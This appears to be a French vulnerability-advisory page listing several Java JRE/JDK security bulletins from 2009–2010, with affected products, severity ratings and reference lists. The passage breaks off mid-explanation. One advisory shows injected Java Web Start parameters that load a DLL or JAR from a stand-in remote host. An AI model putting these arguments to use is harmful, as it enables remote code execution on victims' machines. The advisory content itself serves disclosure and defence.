L'équipe Vigil@nce veille les vulnérabilités publiques qui affectent votre parc informatique, puis propose des correctifs sécurité, une base et des outils pour y remédier.

Vulnérabilités informatiques de Sun J2SE

vulnérabilité CVE-2009-3555 CVE-2010-1321 CVE-2010-3541

Java JRE/JDK/SDK : multiples vulnérabilités

Synthèse de la vulnérabilité

Plusieurs vulnérabilités de Java JRE/JDK/SDK permettent à une applet/application illicite d'exécuter du code ou d'obtenir des informations. Une applet/application légitime, manipulant des données illicites, peut aussi être forcée à exécuter du code.
Produits concernés : Fedora, HPE NNMi, HP-UX, NLD, OES, Java OpenJDK, openSUSE, Java Oracle, RHEL, SLES, ESX, ESXi, vCenter Server, VirtualCenter, VMware vSphere, VMware vSphere Hypervisor.
Gravité : 4/4.
Conséquences : accès/droits utilisateur, lecture de données, création/modification de données, effacement de données, déni de service du service.
Provenance : document.
Nombre de vulnérabilités dans ce bulletin : 29.
Date création : 13/10/2010.
Références : BID-43965, BID-43971, BID-43979, BID-43985, BID-43988, BID-43992, BID-43994, BID-43999, BID-44009, BID-44011, BID-44012, BID-44013, BID-44014, BID-44016, BID-44017, BID-44020, BID-44021, BID-44023, BID-44024, BID-44026, BID-44027, BID-44028, BID-44030, BID-44032, BID-44035, BID-44038, BID-44040, c02616748, c03405642, CERTA-2009-AVI-528, CERTA-2010-AVI-149, CERTA-2010-AVI-196, CERTA-2010-AVI-219, CERTA-2010-AVI-239, CERTA-2010-AVI-241, CERTA-2010-AVI-365, CERTA-2010-AVI-500, CERTA-2010-AVI-513, CERTA-2010-AVI-573, CERTA-2011-AVI-253, CERTA-2011-AVI-400, CERTA-2012-AVI-241, CERTA-2012-AVI-395, CVE-2009-3555, CVE-2010-1321, CVE-2010-3541, CVE-2010-3548, CVE-2010-3549, CVE-2010-3550, CVE-2010-3551, CVE-2010-3552, CVE-2010-3553, CVE-2010-3554, CVE-2010-3555, CVE-2010-3556, CVE-2010-3557, CVE-2010-3558, CVE-2010-3559, CVE-2010-3560, CVE-2010-3561, CVE-2010-3562, CVE-2010-3563, CVE-2010-3565, CVE-2010-3566, CVE-2010-3567, CVE-2010-3568, CVE-2010-3569, CVE-2010-3570, CVE-2010-3571, CVE-2010-3572, CVE-2010-3573, CVE-2010-3574, FEDORA-2010-16240, FEDORA-2010-16294, FEDORA-2010-16312, HPSBMU02799, HPSBUX02608, openSUSE-SU-2010:0754-1, openSUSE-SU-2010:0957-1, RHSA-2010:0768-01, RHSA-2010:0770-01, RHSA-2010:0786-01, RHSA-2010:0807-01, RHSA-2010:0865-02, RHSA-2010:0873-02, RHSA-2010:0935-01, RHSA-2010:0986-01, RHSA-2010:0987-01, RHSA-2011:0152-01, RHSA-2011:0169-01, RHSA-2011:0880-01, SSRT100333, SSRT100867, SUSE-SA:2010:061, SUSE-SA:2011:006, SUSE-SA:2011:014, SUSE-SR:2010:019, VIGILANCE-VUL-10040, VMSA-2011-0003, VMSA-2011-0003.1, VMSA-2011-0003.2, VMSA-2011-0004.2, VMSA-2011-0005.3, VMSA-2011-0012.1, VMSA-2011-0013, VMSA-2012-0005, ZDI-10-202, ZDI-10-203, ZDI-10-204, ZDI-10-205, ZDI-10-206, ZDI-10-207, ZDI-10-208.

Description de la vulnérabilité

Plusieurs vulnérabilités ont été annoncées dans Java JRE/JDK/SDK. Les plus graves de ces vulnérabilités conduisent à l'exécution de code.

Un attaquant peut employer une vulnérabilité de 2D, afin d'obtenir des informations, d'altérer des informations, ou de mener un déni de service. [grav:4/4; BID-43979, CVE-2010-3562]

Un attaquant peut employer une vulnérabilité de 2D (JPEGImageWriter.writeImage), afin d'obtenir des informations, d'altérer des informations, ou de mener un déni de service. [grav:4/4; BID-43985, CVE-2010-3565, ZDI-10-205]

Un attaquant peut employer une vulnérabilité de 2D (ICC Profile Device Information Tag), afin d'obtenir des informations, d'altérer des informations, ou de mener un déni de service. [grav:4/4; BID-43988, CVE-2010-3566, ZDI-10-204]

Un attaquant peut employer une vulnérabilité de 2D, afin d'obtenir des informations, d'altérer des informations, ou de mener un déni de service. [grav:4/4; BID-43992, CVE-2010-3567]

Un attaquant peut employer une vulnérabilité de 2D (ICC Profile Unicode Description), afin d'obtenir des informations, d'altérer des informations, ou de mener un déni de service. [grav:4/4; BID-43965, CVE-2010-3571, ZDI-10-203]

Un attaquant peut employer une vulnérabilité de CORBA, afin d'obtenir des informations, d'altérer des informations, ou de mener un déni de service. [grav:4/4; BID-43994, CVE-2010-3554]

Un attaquant peut employer une vulnérabilité de Deployment, afin d'obtenir des informations, d'altérer des informations, ou de mener un déni de service. [grav:4/4; BID-43999, CVE-2010-3563]

Un attaquant peut employer une vulnérabilité de Java Runtime Environment, afin d'obtenir des informations, d'altérer des informations, ou de mener un déni de service. [grav:4/4; BID-44012, CVE-2010-3568]

Un attaquant peut employer une vulnérabilité de Java Runtime Environment, afin d'obtenir des informations, d'altérer des informations, ou de mener un déni de service. [grav:4/4; BID-44016, CVE-2010-3569]

Un attaquant peut employer une vulnérabilité de Java Web Start, afin d'obtenir des informations, d'altérer des informations, ou de mener un déni de service. [grav:4/4; BID-44021, CVE-2010-3558]

Un attaquant peut employer une vulnérabilité de New Java Plug-in docbase, afin d'obtenir des informations, d'altérer des informations, ou de mener un déni de service. [grav:4/4; BID-44023, CVE-2010-3552, ZDI-10-206]

Un attaquant peut employer une vulnérabilité de Sound (HeadspaceSoundbank.nGetName), afin d'obtenir des informations, d'altérer des informations, ou de mener un déni de service. [grav:4/4; BID-44026, CVE-2010-3559, ZDI-10-208]

Un attaquant peut employer une vulnérabilité de Sound, afin d'obtenir des informations, d'altérer des informations, ou de mener un déni de service. [grav:4/4; BID-44030, CVE-2010-3572]

Un attaquant peut employer une vulnérabilité de Swing, afin d'obtenir des informations, d'altérer des informations, ou de mener un déni de service. [grav:4/4; BID-44035, CVE-2010-3553]

Un attaquant peut employer une vulnérabilité de Deployment, afin d'obtenir des informations, d'altérer des informations, ou de mener un déni de service. [grav:4/4; BID-44038, CVE-2010-3555]

Un attaquant peut employer une vulnérabilité de Java Web Start, afin d'obtenir des informations, d'altérer des informations, ou de mener un déni de service. [grav:4/4; BID-44040, CVE-2010-3550]

Un attaquant peut employer une vulnérabilité de Deployment Toolkit, afin d'obtenir des informations, d'altérer des informations, ou de mener un déni de service. [grav:4/4; BID-44020, CVE-2010-3570]

Un attaquant peut employer une vulnérabilité de CORBA, afin d'obtenir des informations, d'altérer des informations, ou de mener un déni de service. [grav:3/4; BID-44013, CVE-2010-3561]

Un attaquant peut employer une vulnérabilité de JSSE, afin d'obtenir des informations, d'altérer des informations, ou de mener un déni de service. [grav:3/4; CERTA-2009-AVI-528, CERTA-2010-AVI-149, CERTA-2010-AVI-196, CERTA-2010-AVI-239, CERTA-2010-AVI-241, CERTA-2010-AVI-365, CERTA-2010-AVI-513, CERTA-2010-AVI-573, CERTA-2011-AVI-253, CERTA-2012-AVI-241, CVE-2009-3555]

Un attaquant peut employer une vulnérabilité de Kerberos, afin de mener un déni de service. [grav:2/4; CERTA-2010-AVI-219, CERTA-2011-AVI-400, CVE-2010-1321]

Un attaquant peut employer une vulnérabilité de Networking, afin d'obtenir des informations, d'altérer des informations, ou de mener un déni de service. [grav:3/4; BID-44027, CVE-2010-3549]

Un attaquant peut employer une vulnérabilité de Swing, afin d'obtenir des informations, d'altérer des informations, ou de mener un déni de service. [grav:3/4; BID-44014, CVE-2010-3557]

Un attaquant peut employer une vulnérabilité de Networking, afin d'obtenir des informations, d'altérer des informations, ou de mener un déni de service. [grav:3/4; BID-44032, CVE-2010-3541]

Un attaquant peut employer une vulnérabilité de Networking, afin d'obtenir des informations, d'altérer des informations, ou de mener un déni de service. [grav:3/4; BID-44028, CVE-2010-3573]

Un attaquant peut employer une vulnérabilité de Networking, afin d'obtenir des informations, d'altérer des informations, ou de mener un déni de service. [grav:3/4; BID-44011, CVE-2010-3574]

Un attaquant peut employer une vulnérabilité de JNDI, afin d'obtenir des informations. [grav:2/4; BID-44017, CVE-2010-3548]

Un attaquant peut employer une vulnérabilité de Networking, afin d'obtenir des informations. [grav:2/4; BID-44009, CVE-2010-3551]

Un attaquant peut employer une vulnérabilité de Networking, afin d'obtenir des informations. [grav:1/4; BID-44024, CVE-2010-3560]

Un attaquant peut employer une vulnérabilité de 2D, afin d'obtenir des informations, d'altérer des informations, ou de mener un déni de service. [grav:4/4; BID-43971, CERTA-2010-AVI-500, CVE-2010-3556]
Bulletin Vigil@nce complet... (Essai gratuit)

avis de vulnérabilité CVE-2010-0887

Java JRE/JDK 6 : exécution de code via Java Plug-in

Synthèse de la vulnérabilité

Un attaquant peut créer une page HTML contenant une applet Java illicite, afin de faire exécuter du code sur la machine de la victime.
Produits concernés : Java OpenJDK, Java Oracle, RHEL.
Gravité : 3/4.
Conséquences : accès/droits utilisateur.
Provenance : document.
Date création : 16/04/2010.
Références : BID-39492, CVE-2010-0887, RHSA-2010:0356-02, RHSA-2010:0549-01, VIGILANCE-VUL-9594.

Description de la vulnérabilité

Le Java Plug-in est appelé pour afficher les applets Java contenues dans une page HTML.

Une vulnérabilité inconnue de Java Plug-in permet de faire exécuter du code. Les versions 6 Update 18 et 19 sont impactées sous Windows, Solaris et Linux, installé sur un processeur 32 bits.

Un attaquant peut donc créer une page HTML contenant une applet Java illicite, afin de faire exécuter du code sur la machine de la victime.
Bulletin Vigil@nce complet... (Essai gratuit)

avis de vulnérabilité informatique CVE-2010-0886 CVE-2010-1423

Java JRE/JDK 6 : exécution de code via Java Deployment Toolkit

Synthèse de la vulnérabilité

Lorsque Java Deployment Toolkit est installé, un attaquant peut créer un document HTML exécutant du code Java ou une commande Shell.
Produits concernés : Windows 2003, Windows 2008 R0, Windows 2008 R2, Windows 7, Windows Vista, Windows XP, Java OpenJDK, Java Oracle, RHEL, ESX, ESXi, vCenter Server, VirtualCenter, VMware vSphere, VMware vSphere Hypervisor.
Gravité : 3/4.
Conséquences : accès/droits utilisateur.
Provenance : document.
Nombre de vulnérabilités dans ce bulletin : 2.
Date création : 12/04/2010.
Date révision : 15/04/2010.
Références : 2508272, BID-39346, CVE-2010-0886, CVE-2010-1423, MS11-027, RHSA-2010:0356-02, VIGILANCE-VUL-9569, VMSA-2011-0003, VMSA-2011-0003.1, VMSA-2011-0003.2, VU#886582.

Description de la vulnérabilité

L'outil Java Deployment Toolkit est installé en tant qu'ActiveX (Internet Explorer) ou plugin NPAPI (Firefox), afin de distribuer facilement des applications Java en utilisant des fichiers JNLP.

La méthode launch() ou le paramètre launchjnlp de Java Deployment Toolkit indiquent les paramètres à transmettre à Java Web Start.

Cependant, Java Web Start accepte des paramètres dangereux :
 - pour charger une DLL : -J-XXaltjvm=\\1.2.3.4\evil.dll
 - pour utiliser une archive JAR : -J-jar -J\\1.2.3.4\exploit.jar

Un attaquant peut donc créer un document HTML, appelant Java Deployment Toolkit, puis Java Web Start, pour exécuter du code.
Bulletin Vigil@nce complet... (Essai gratuit)

vulnérabilité CVE-2009-3555 CVE-2009-3910 CVE-2010-0082

Java JRE/JDK/SDK : multiples vulnérabilités

Synthèse de la vulnérabilité

Plusieurs vulnérabilités de Java JRE/JDK/SDK permettent à une applet/application illicite d'exécuter du code ou d'obtenir des informations. Une applet/application légitime, manipulant des données illicites, peut aussi être forcée à exécuter du code.
Produits concernés : Fedora, HPE NNMi, HP-UX, MES, Mandriva Linux, NLD, OES, Java OpenJDK, openSUSE, Java Oracle, RHEL, SLES, ESX, ESXi, vCenter Server, VirtualCenter, VMware vSphere, VMware vSphere Hypervisor.
Gravité : 3/4.
Conséquences : accès/droits utilisateur, lecture de données, déni de service du service.
Provenance : document.
Nombre de vulnérabilités dans ce bulletin : 5.
Date création : 31/03/2010.
Références : BID-39062, BID-39065, BID-39067, BID-39068, BID-39069, BID-39070, BID-39071, BID-39072, BID-39073, BID-39075, BID-39077, BID-39078, BID-39081, BID-39082, BID-39083, BID-39084, BID-39085, BID-39086, BID-39088, BID-39089, BID-39090, BID-39091, BID-39093, BID-39094, BID-39095, BID-39096, BID-39559, c02122104, c03405642, CERTA-2009-AVI-528, CERTA-2010-AVI-149, CERTA-2010-AVI-192, CERTA-2010-AVI-196, CERTA-2010-AVI-239, CERTA-2010-AVI-241, CERTA-2010-AVI-276, CERTA-2010-AVI-365, CERTA-2010-AVI-513, CERTA-2010-AVI-573, CERTA-2011-AVI-253, CERTA-2012-AVI-241, CERTA-2012-AVI-395, CVE-2009-3555, CVE-2009-3910, CVE-2010-0082, CVE-2010-0084, CVE-2010-0085, CVE-2010-0087, CVE-2010-0088, CVE-2010-0089, CVE-2010-0090, CVE-2010-0091, CVE-2010-0092, CVE-2010-0093, CVE-2010-0094, CVE-2010-0095, CVE-2010-0837, CVE-2010-0838, CVE-2010-0839, CVE-2010-0840, CVE-2010-0841, CVE-2010-0842, CVE-2010-0843, CVE-2010-0844, CVE-2010-0845, CVE-2010-0846, CVE-2010-0847, CVE-2010-0848, CVE-2010-0849, CVE-2010-0850, FEDORA-2010-6025, FEDORA-2010-6039, FEDORA-2010-6279, HPSBMU02799, HPSBUX02524, javacpumar2010, MDVSA-2010:084, RHSA-2010:0337-01, RHSA-2010:0338-01, RHSA-2010:0339-01, RHSA-2010:0383-01, RHSA-2010:0408-01, RHSA-2010:0471-01, RHSA-2010:0489-01, RHSA-2010:0574-01, RHSA-2010:0586-01, RHSA-2010:0865-02, SSRT100089, SSRT100867, SUSE-SA:2010:026, SUSE-SA:2010:028, SUSE-SR:2010:008, SUSE-SR:2010:011, SUSE-SR:2010:013, SUSE-SR:2010:017, VIGILANCE-VUL-9550, VMSA-2011-0003, VMSA-2011-0003.1, VMSA-2011-0003.2, VU#507652, ZDI-10-051, ZDI-10-052, ZDI-10-053, ZDI-10-054, ZDI-10-055, ZDI-10-056, ZDI-10-057, ZDI-10-059, ZDI-10-060, ZDI-10-061.

Description de la vulnérabilité

Plusieurs vulnérabilités ont été annoncées dans Java JRE/JDK/SDK. Les plus graves de ces vulnérabilités conduisent à l'exécution de code.

Vingt quatre vulnérabilités conduisent à l'exécution de code. [grav:3/4; BID-39062, BID-39065, BID-39067, BID-39068, BID-39069, BID-39070, BID-39071, BID-39072, BID-39073, BID-39075, BID-39077, BID-39078, BID-39081, BID-39082, BID-39083, BID-39084, BID-39085, BID-39086, BID-39088, BID-39089, BID-39090, BID-39091, BID-39094, CERTA-2009-AVI-528, CERTA-2010-AVI-149, CERTA-2010-AVI-196, CERTA-2010-AVI-239, CERTA-2010-AVI-241, CERTA-2010-AVI-276, CERTA-2010-AVI-365, CERTA-2010-AVI-513, CERTA-2010-AVI-573, CERTA-2011-AVI-253, CERTA-2012-AVI-241, CVE-2009-3555, CVE-2010-0082, CVE-2010-0085, CVE-2010-0087, CVE-2010-0088, CVE-2010-0090, CVE-2010-0092, CVE-2010-0093, CVE-2010-0094, CVE-2010-0095, CVE-2010-0837, CVE-2010-0838, CVE-2010-0839, CVE-2010-0840, CVE-2010-0841, CVE-2010-0842, CVE-2010-0843, CVE-2010-0844, CVE-2010-0845, CVE-2010-0846, CVE-2010-0847, CVE-2010-0848, CVE-2010-0849, CVE-2010-0850, VU#507652, ZDI-10-051, ZDI-10-052, ZDI-10-053, ZDI-10-054, ZDI-10-055, ZDI-10-056, ZDI-10-057, ZDI-10-059, ZDI-10-060, ZDI-10-061]

Un attaquant peut obtenir des informations sensibles. [grav:2/4; BID-39093, CERTA-2010-AVI-192, CVE-2010-0084]

Un attaquant peut mener un déni de service de Java Web Start. [grav:2/4; BID-39095, CVE-2010-0089]

Un attaquant peut obtenir des informations sensibles. [grav:2/4; BID-39096, CVE-2010-0091]

Un buffer overflow de HsbParser.getSoundBank() conduit à l'exécution de code. [grav:3/4; BID-39559, CVE-2009-3910]
Bulletin Vigil@nce complet... (Essai gratuit)

vulnérabilité informatique CVE-2009-2625

Apache Xerces2 Java, Java JRE/JDK, OpenJDK : corruption de mémoire via XML

Synthèse de la vulnérabilité

Un attaquant peut créer des données XML contenant un octet illicite qui corrompt la mémoire, afin de mener un déni de service ou d'exécuter du code dans Apache Xerces2 Java, Java JRE/JDK ou OpenJDK.
Produits concernés : Xerces Java, Debian, HP-UX, MES, Mandriva Linux, Java OpenJDK, openSUSE, Oracle GlassFish Server, Java Oracle, RHEL, JBoss EAP par Red Hat, Slackware, Sun AS, SLES.
Gravité : 3/4.
Conséquences : accès/droits utilisateur, déni de service du service, déni de service du client.
Provenance : document.
Date création : 10/08/2009.
Date révision : 09/12/2009.
Références : 272209, 6870754, BID-35958, CVE-2009-2625, DSA-1984-1, FICORA #245608, HPSBUX02476, MDVSA-2011:108, RHSA-2009:1199-01, RHSA-2009:1200-01, RHSA-2009:1201-01, RHSA-2009:1505-01, RHSA-2009:1582-01, RHSA-2009:1615-01, RHSA-2011:0858-01, RHSA-2012:0725-01, RHSA-2012:1232-01, RHSA-2012:1537-01, RHSA-2013:0763-01, SSA:2011-041-02, SSRT090250, SUSE-SR:2009:014, SUSE-SR:2009:016, SUSE-SR:2009:017, SUSE-SR:2010:011, SUSE-SR:2010:013, SUSE-SR:2010:014, SUSE-SR:2010:015, VIGILANCE-VUL-8925.

Description de la vulnérabilité

Les produits Apache Xerces2 Java, Java JRE/JDK et OpenJDK manipulent des données XML. Ils partagent la même vulnérabilité.

Un attaquant peut créer des données XML contenant un octet illicite qui corrompt la mémoire, afin de mener un déni de service ou d'exécuter du code dans ces produits.
Bulletin Vigil@nce complet... (Essai gratuit)

alerte de vulnérabilité informatique CVE-2009-3728 CVE-2009-3729 CVE-2009-3864

Java JRE/JDK/SDK : multiples vulnérabilités

Synthèse de la vulnérabilité

Plusieurs vulnérabilités de Java JRE/JDK/SDK permettent à une applet/application illicite d'exécuter du code ou d'obtenir des informations. Une applet/application légitime, manipulant des données illicites, peut aussi être forcée à exécuter du code.
Produits concernés : Fedora, HPE NNMi, HP-UX, MES, Mandriva Linux, NLD, OES, Java OpenJDK, openSUSE, Java Oracle, RHEL, SLES, ESX, vCenter Server, VirtualCenter.
Gravité : 3/4.
Conséquences : accès/droits utilisateur, lecture de données, déni de service du service.
Provenance : document.
Nombre de vulnérabilités dans ce bulletin : 16.
Date création : 04/11/2009.
Date révision : 12/11/2009.
Références : 269868, 269869, 269870, 270474, 270475, 270476, 6631533, 6636650, 6657026, 6657138, 6664512, 6815780, 6822057, 6824265, 6854303, 6862968, 6862969, 6862970, 6863503, 6864911, 6869694, 6869752, 6870531, 6872357, 6872358, 6872824, 6874643, BID-36881, c01997760, c03005726, c03405642, CERTA-2011-AVI-523, CERTA-2011-AVI-651, CERTA-2012-AVI-395, CVE-2009-3728, CVE-2009-3729, CVE-2009-3864, CVE-2009-3865, CVE-2009-3866, CVE-2009-3867, CVE-2009-3868, CVE-2009-3869, CVE-2009-3871, CVE-2009-3872, CVE-2009-3873, CVE-2009-3874, CVE-2009-3875, CVE-2009-3876, CVE-2009-3877, CVE-2009-3879, CVE-2009-3880, CVE-2009-3881, CVE-2009-3882, CVE-2009-3883, CVE-2009-3884, CVE-2009-3886, FEDORA-2009-11486, FEDORA-2009-11490, HPSBMU02703, HPSBMU02799, HPSBUX02503, MDVSA-2010:084, RHSA-2009:1560-01, RHSA-2009:1571-01, RHSA-2009:1584-01, RHSA-2009:1643-01, RHSA-2009:1647-01, RHSA-2009:1662-01, RHSA-2009:1694-01, RHSA-2010:0043-01, RHSA-2010:0408-01, SSRT100019, SSRT100242, SSRT100867, SUSE-SA:2009:058, SUSE-SA:2010:002, SUSE-SA:2010:003, SUSE-SA:2010:004, VIGILANCE-VUL-9156, VMSA-2010-0002, VMSA-2010-0002.1, VMSA-2010-0002.2, VMSA-2010-0002.3, ZDI-09-076, ZDI-09-077, ZDI-09-078, ZDI-09-079, ZDI-09-080.

Description de la vulnérabilité

Plusieurs vulnérabilités ont été annoncées dans Java JRE/JDK/SDK.

Le mécanisme de mise à jour Java pour les versions non anglaises ne met pas à jour le JRE quand une nouvelle version est disponible. [grav:1/4; 269868, 6869694, BID-36881, CVE-2009-3864]

Une vulnérabilité dans l'exécution de commandes de Java Runtime Environment Deployment Toolkit peut être exploité afin d'exécuter du code arbitraire. [grav:3/4; 269869, 6869752, BID-36881, CVE-2009-3865]

Une vulnérabilité du Java Web Start Installer peut être exploitée afin de permettre à une Java Web Start Application de s'exécuter en tant qu'application de confiance. [grav:3/4; 269870, 6869752, 6872824, BID-36881, CVE-2009-3866, ZDI-09-077]

Plusieurs vulnérabilités de type buffer overflow présentes dans les classes de traitement audio et image peuvent être expoitées afin de permettre une élévation de privilèges. [grav:3/4; 270474, 6854303, 6862968, 6862969, 6862970, 6872357, 6872358, 6874643, BID-36881, CERTA-2011-AVI-523, CERTA-2011-AVI-651, CVE-2009-3867, CVE-2009-3868, CVE-2009-3869, CVE-2009-3871, CVE-2009-3872, CVE-2009-3873, CVE-2009-3874, ZDI-09-076, ZDI-09-078, ZDI-09-079, ZDI-09-080]

Une vulnérabilité dans la vérification d'un Digest HMAC du Java Runtime Environment peut être exploitée afin de contourner l'authentification. [grav:3/4; 270475, 6863503, BID-36881, CVE-2009-3875]

Une vulnérabilité du décodage DER peut être exploitée par un client afin de saturer la mémoire du JRE du serveur résultant en un déni de service. [grav:3/4; 270476, 6864911, BID-36881, CVE-2009-3876]

Une vulnérabilité du parsing des entêtes HTTP peut être exploitée par un client afin de saturer la mémoire du JRE du serveur résultant en un déni de service. [grav:3/4; 270476, 6864911, BID-36881, CVE-2009-3877]

Un attaquant peut employer la méthode ICC_Profile.getInstance() pour détecter la présence d'un fichier. [grav:1/4; 6631533, CVE-2009-3728]

Un attaquant peut employer une police TrueType, afin de mener un déni de service. [grav:1/4; 6815780, CVE-2009-3729]

Un attaquant peut utiliser une vulnérabilité de X11 et Win32GraphicsDevice. [grav:2/4; 6822057, CVE-2009-3879]

Un attaquant peut employer Component, KeyboardFocusManager et DefaultKeyboardFocusManager d'AWT (Abstract Window Toolkit), afin d'obtenir des informations sensibles. [grav:2/4; 6664512, CVE-2009-3880]

Un attaquant peut obtenir des informations via ClassLoader. [grav:3/4; 6636650, CVE-2009-3881]

Un attaquant peut obtenir des informations via Swing. [grav:2/4; 6657026, CVE-2009-3882]

Un attaquant peut obtenir des informations via Windows Pluggable Look and Feel. [grav:2/4; 6657138, CVE-2009-3883]

Un attaquant peut employer la méthode TimeZone.getTimeZone() pour détecter la présence de fichiers. [grav:2/4; 6824265, CVE-2009-3884]

Un attaquant peut employer une vulnérabilité d'un JAR signé. [grav:2/4; 6870531, CVE-2009-3886]
Bulletin Vigil@nce complet... (Essai gratuit)

alerte de vulnérabilité informatique CVE-2009-0217 CVE-2009-0901 CVE-2009-1896

Java JRE/JDK/SDK : multiples vulnérabilités

Synthèse de la vulnérabilité

Plusieurs vulnérabilités de Java JRE/JDK/SDK permettent à une applet/application illicite d'exécuter du code ou d'obtenir des informations. Une applet/application légitime, manipulant des données illicites, peut aussi être forcée à exécuter du code.
Produits concernés : Fedora, HP-UX, MES, Mandriva Linux, Java OpenJDK, openSUSE, Java Oracle, RHEL, SLES, ESX, ESXi, VMware Server, vCenter Server, VirtualCenter.
Gravité : 3/4.
Conséquences : accès/droits utilisateur, lecture de données, création/modification de données.
Provenance : document.
Nombre de vulnérabilités dans ce bulletin : 16.
Date création : 05/08/2009.
Date révision : 07/08/2009.
Références : 263408, 263409, 263428, 263429, 263488, 263489, 263490, 264648, 6406003, 6429594, 6444262, 6446522, 6738524, 6755840, 6782979, 6801071, 6801497, 6805231, 6818787, 6823373, 6824440, 6830335, 6845701, 6848964, 6849518, 6862844, BID-35671, BID-35828, BID-35830, BID-35832, BID-35922, BID-35939, BID-35942, BID-35943, BID-35944, BID-35945, BID-35946, BID-35958, CERTA-2009-AVI-279, CERTA-2009-AVI-300, CERTA-2009-AVI-312, CERTA-2009-AVI-365, CERTA-2009-AVI-435, CERTA-2009-AVI-440, CERTA-2009-AVI-452, CERTA-2009-AVI-516, CERTA-2009-AVI-538, CERTA-2010-AVI-083, CERTA-2010-AVI-253, CVE-2009-0217, CVE-2009-0901, CVE-2009-1896, CVE-2009-2475, CVE-2009-2476, CVE-2009-2493, CVE-2009-2495, CVE-2009-2625, CVE-2009-2670, CVE-2009-2671, CVE-2009-2672, CVE-2009-2673, CVE-2009-2674, CVE-2009-2675, CVE-2009-2676, CVE-2009-2689, CVE-2009-2690, CVE-2009-2716, CVE-2009-2717, CVE-2009-2718, CVE-2009-2719, CVE-2009-2720, CVE-2009-2721, CVE-2009-2722, CVE-2009-2723, CVE-2009-2724, FEDORA-2009-8329, FEDORA-2009-8337, HPSBUX02476, MDVSA-2009:209, RHSA-2009:1199-01, RHSA-2009:1200-01, RHSA-2009:1201-01, RHSA-2009:1236-01, RHSA-2009:1582-01, RHSA-2009:1662-01, RHSA-2010:0043-01, SSRT090250, SUSE-SA:2009:043, SUSE-SA:2009:053, SUSE-SR:2009:016, SUSE-SR:2009:017, SUSE-SR:2010:012, SUSE-SR:2010:015, VIGILANCE-VUL-8916, VMSA-2009-0016, VMSA-2009-0016.1, VMSA-2009-0016.2, VMSA-2009-0016.3, VMSA-2009-0016.4, VMSA-2009-0016.5, VMSA-2010-0002, VMSA-2010-0002.1, VMSA-2010-0002.2, VMSA-2010-0002.3, VU#456745, VU#466161, ZDI-09-049, ZDI-09-050.

Description de la vulnérabilité

Plusieurs vulnérabilités ont été annoncées dans Java JRE/JDK/SDK.

Une vulnérabilité du système audio permet d'accéder aux propriétés "java.lang.System". [grav:1/4; 263408, 6738524, BID-35939, CERTA-2009-AVI-365, CVE-2009-2670]

Lorsqu'un proxy SOCKS est utilisé, une applet/application peut déterminer le nom de l'utilisateur courant. [grav:2/4; 263409, 6801071, BID-35943, CVE-2009-2671]

Lorsqu'un proxy est utilisé, une applet/application peut lire les cookies. [grav:3/4; 263409, 6801071, BID-35943, CVE-2009-2672]

Lorsqu'un proxy est utilisé, une applet/application illicite peut se connecter sur un serveur différent de son serveur d'origine. [grav:2/4; 263409, 6801497, BID-35943, CVE-2009-2673]

Lorsqu'une image JPEG illicite est analysée par une applet/application Java, un débordement d'entier se produit et conduit à l'exécution de code. [grav:3/4; 263428, 6823373, BID-35942, CVE-2009-2674, ZDI-09-050]

La recommandation XMLDsig autorise un attaquant à contourner la signature d'un document XML (VIGILANCE-VUL-8864). [grav:3/4; 263429, 6824440, BID-35671, CERTA-2009-AVI-279, CERTA-2009-AVI-452, CERTA-2010-AVI-253, CVE-2009-0217, VU#466161]

Lorsqu'une archive Unpack200 illicite est ouverte par l'utilitaire JAR dans une applet/application Java, un débordement d'entier se produit et conduit à l'exécution de code. [grav:3/4; 263488, 6830335, BID-35944, CVE-2009-2675, ZDI-09-049]

Un attaquant peut créer des données XML malformées afin de corrompre la mémoire (VIGILANCE-VUL-8925). [grav:3/4; 263489, 6845701, BID-35958, CERTA-2009-AVI-312, CVE-2009-2625]

Une applet Java illicite peut employer JNLPAppletLauncher pour déposer et exécuter une autre applet. [grav:3/4; 263490, 6782979, BID-35946, CVE-2009-2676]

L'ActiveX Java Web Start utilise une version vulnérable de la bibliothèque Active Template Library (VIGILANCE-VUL-8895). [grav:3/4; 264648, 6862844, BID-35828, BID-35830, BID-35832, BID-35945, CERTA-2009-AVI-300, CERTA-2009-AVI-435, CERTA-2009-AVI-440, CERTA-2009-AVI-516, CERTA-2009-AVI-538, CERTA-2010-AVI-083, CVE-2009-0901, CVE-2009-2493, CVE-2009-2495, VU#456745]

Certaines versions de WebStart exécutent du code non signé. [grav:3/4; CVE-2009-1896]

Un attaquant peut employer des variables pour obtenir des informations. [grav:2/4; CVE-2009-2475]

Un attaquant peut contourner les restrictions d'accès de OpenType. [grav:3/4; CVE-2009-2476]

Un attaquant peut employer JDK13Services pour accéder à certains objets. [grav:2/4; CVE-2009-2689]

Un attaquant peut obtenir des informations sur des variables privées. [grav:2/4; CVE-2009-2690]

Plusieurs vulnérabilités mineures ont aussi été annoncées. [grav:2/4; 6406003, 6429594, 6444262, 6446522, 6755840, 6805231, 6818787, 6848964, 6849518, CVE-2009-2716, CVE-2009-2717, CVE-2009-2718, CVE-2009-2719, CVE-2009-2720, CVE-2009-2721, CVE-2009-2722, CVE-2009-2723, CVE-2009-2724]
Bulletin Vigil@nce complet... (Essai gratuit)

avis de vulnérabilité CVE-2009-0217

XML : contournement de signature

Synthèse de la vulnérabilité

La recommandation XMLDsig autorise un attaquant à contourner la signature d'un document XML.
Produits concernés : Apache XML Security for Java, Debian, Fedora, HP-UX, WebSphere AS Traditional, MES, Mandriva Linux, .NET Framework, Windows 2000, Windows 2003, Windows 2008 R0, Windows 2008 R2, Windows 7, Windows Vista, Windows XP, Java OpenJDK, Oracle GlassFish Server, Java Oracle, RHEL, Unix (plateforme) ~ non exhaustif.
Gravité : 3/4.
Conséquences : création/modification de données, transit de données.
Provenance : document.
Date création : 15/07/2009.
Références : 269208, 47526, 6868619, 981343, BID-35671, CVE-2009-0217, DSA-1849-1, FEDORA-2009-8121, FEDORA-2009-8157, FEDORA-2009-8456, FEDORA-2009-8473, HPSBUX02476, MDVSA-2009:267, MDVSA-2009:268, MDVSA-2009:269, MDVSA-2009:318, MDVSA-2009:322, MS10-041, PK80596, PK80627, RHSA-2009:1428-01, SSRT090250, VIGILANCE-VUL-8864, VU#466161.

Description de la vulnérabilité

La recommandation W3C XMLDsig (XML Signature Syntax and Processing) indique comment signer les données XML.

Les algorithmes HMAC permettent de signer un document, en utilisant une clé et un algorithme de hachage.

Le paramètre XMLDsig ds:HMACOutputLength indique le nombre de bits du haché qui est utilisé sur les données. Le destinataire du document XML ne vérifie donc que ces premiers bits du haché.

